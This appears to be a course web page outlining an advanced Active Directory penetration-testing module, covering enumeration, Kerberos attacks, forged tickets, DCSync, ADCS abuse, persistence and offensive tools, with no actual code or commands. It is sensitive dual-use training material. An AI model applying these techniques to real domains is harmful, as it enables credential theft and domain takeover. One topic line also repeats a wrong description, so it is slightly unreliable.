๐ข Active Directory Security
Master Windows domain exploitation - From enumeration to complete domain takeover
Advanced LevelOverview
Active Directory security is a critical skill for any penetration tester working in enterprise environments. This advanced module covers comprehensive AD attack vectors, from initial enumeration to complete domain compromise. You'll learn both traditional and modern attack techniques used by real-world threat actors.
Learning Objectives
- Master Active Directory enumeration and reconnaissance
- Develop expertise in Kerberos-based attacks
- Learn Golden and Silver Ticket attack techniques
- Understand ADCS certificate-based attacks
- Master delegation abuse and DCSync attacks
- Utilize Bloodhound for attack path analysis
๐ AD Enumeration & Reconnaissance
Domain Information Gathering
Comprehensive techniques for gathering domain intelligence without triggering alerts.
- Domain trust enumeration
- Domain controller identification
- Forest and domain functional levels
- Service Principal Name (SPN) discovery
User & Group Enumeration
Advanced user and group enumeration techniques for privilege escalation planning.
- Domain admin and privileged group identification
- Service account discovery
- Nested group membership analysis
- User property extraction
Computer & Service Discovery
Identifying high-value targets and attack paths within the domain.
- Domain controller enumeration
- Server role identification
- Workstation operating system analysis
- Service account mapping
๐ซ Kerberos Attacks
Kerberoasting
Extracting and cracking service account credentials via Kerberos TGS tickets.
- SPN identification and targeting
- TGS ticket extraction techniques
- Offline password cracking strategies
- Targeted vs. broad Kerberoasting
ASREPRoasting
Exploiting accounts with "Do not require Kerberos preauthentication" setting.
- Vulnerable account identification
- AS-REP hash extraction
- Hashcat optimization for AS-REP
- User enumeration via ASREPRoasting
Kerberos Delegation Abuse
Exploiting constrained and unconstrained delegation for privilege escalation.
- Unconstrained delegation exploitation
- Constrained delegation abuse
- Resource-based constrained delegation
- S4U2Self and S4U2Proxy attacks
๐ Golden & Silver Ticket Attacks
Golden Ticket Creation
Creating forged TGT tickets for complete domain access.
- KRBTGT hash extraction
- Domain SID identification
- Ticket lifetime and group membership
- Cross-domain Golden Tickets
Silver Ticket Exploitation
Forging TGS tickets for specific service access.
- Service account hash extraction
- Service-specific ticket creation
- Host-based Silver Tickets
- CIFS, HTTP, and MSSQL Silver Tickets
Ticket Persistence Techniques
Maintaining persistent access through ticket manipulation.
- Ticket injection and renewal
- Memory-based ticket storage
- Cross-session ticket usage
- Ticket lifetime extension
โ ๏ธ DCSync & DCShadow Attacks
DCSync Implementation
Replicating password hashes from domain controllers without admin access.
- Directory Replication Service abuse
- Selective hash extraction
- NTDS.dit replication techniques
- Stealth DCSync methodologies
DCShadow Exploitation
Creating rogue domain controllers for persistent manipulation.
- Rogue DC registration
- Schema manipulation
- Object attribute modification
- Backdoor user creation
Advanced Persistence
Long-term domain persistence through directory manipulation.
- AdminSDHolder abuse
- Group Policy modification
- Security descriptor manipulation
- DSRM password attacks
๐ ADCS Certificate Attacks
Certificate Template Abuse
Exploiting misconfigured certificate templates for privilege escalation.
- ESC1: Misconfigured certificate templates
- ESC2: Misconfigured certificate templates
- ESC3: Misconfigured enrollment agent templates
- ESC4: Vulnerable certificate template access control
PKI Infrastructure Attacks
Advanced attacks against the PKI infrastructure itself.
- ESC5: Vulnerable PKI object access control
- ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2
- ESC7: Vulnerable certificate authority access control
- ESC8: NTLM relay to AD CS HTTP endpoints
Certificate-Based Persistence
Using certificates for long-term domain access.
- User certificate theft
- Machine certificate abuse
- Shadow credentials attack
- Certificate template backdooring
๐ฉธ Bloodhound Analysis
Data Collection
Comprehensive Active Directory data collection for attack path analysis.
- SharpHound data collection
- BloodHound.py remote collection
- AzureHound for cloud environments
- Custom collector development
Attack Path Discovery
Identifying and visualizing paths to high-value targets.
- Shortest path to Domain Admins
- Kerberoastable user identification
- ASREPRoastable account discovery
- Unconstrained delegation hunting
Custom Queries & Analysis
Advanced Cypher queries for targeted attack planning.
- Custom Cypher query development
- Edge relationship analysis
- Privilege escalation path mapping
- Lateral movement planning
๐งช Hands-on Lab: Complete AD Compromise
Objective: Perform a full Active Directory compromise from initial foothold to Domain Admin.
Duration: 8-12 hours
Skills Practiced: AD enumeration, Kerberos attacks, privilege escalation, persistence
Start Lab Exercise๐ ๏ธ Essential Tools
Enumeration Tools
- BloodHound: AD attack path analysis
- PowerView: PowerShell AD enumeration
- ADRecon: AD information gathering
- ldapdomaindump: LDAP enumeration
Attack Tools
- Impacket: Python AD attack toolkit
- Rubeus: C# Kerberos interaction
- Mimikatz: Credential extraction
- Certify: ADCS attack tool
Post-Exploitation
- PowerShell Empire: Post-exploitation framework
- Cobalt Strike: Red team platform
- SharpCollection: C# offensive tools
- LOLBAS: Living off the land binaries
๐ Recommended Resources
- Active Directory Security - Sean Metcalf's comprehensive guide
- Attacking Active Directory - Modern AD attack techniques
- BloodHound Documentation - Official attack path analysis guide
- SpecterOps Blog - Advanced AD research and techniques
- HarmJ0y Blog - PowerShell and AD exploitation research
๐ฏ Certification Alignment
CRTP (Certified Red Team Professional)
This module directly aligns with CRTP certification requirements:
- โ Active Directory Enumeration
- โ Local Privilege Escalation
- โ Lateral Movement
- โ Domain Privilege Escalation
- โ Domain Persistence
- โ Forest-level Privilege Escalation
ADCS CESP (Certificate Services)
Advanced ADCS attack techniques covered:
- โ Certificate Template Exploitation
- โ PKI Infrastructure Attacks
- โ ESC1-ESC8 Attack Scenarios
- โ Certificate-Based Persistence
๐ Learning Progress
Track your Active Directory security expertise:
Complete the sections above to track your progress
Frequently Asked Questions
What is Active Directory security?
Active Directory security focuses on protecting and hardening Microsoft AD environments against attacks.
What topics are covered in this roadmap?
Kerberos attacks, ADCS exploitation, domain hardening, and more.
Who should use this roadmap?
Penetration testers, red teamers, and system administrators working with AD.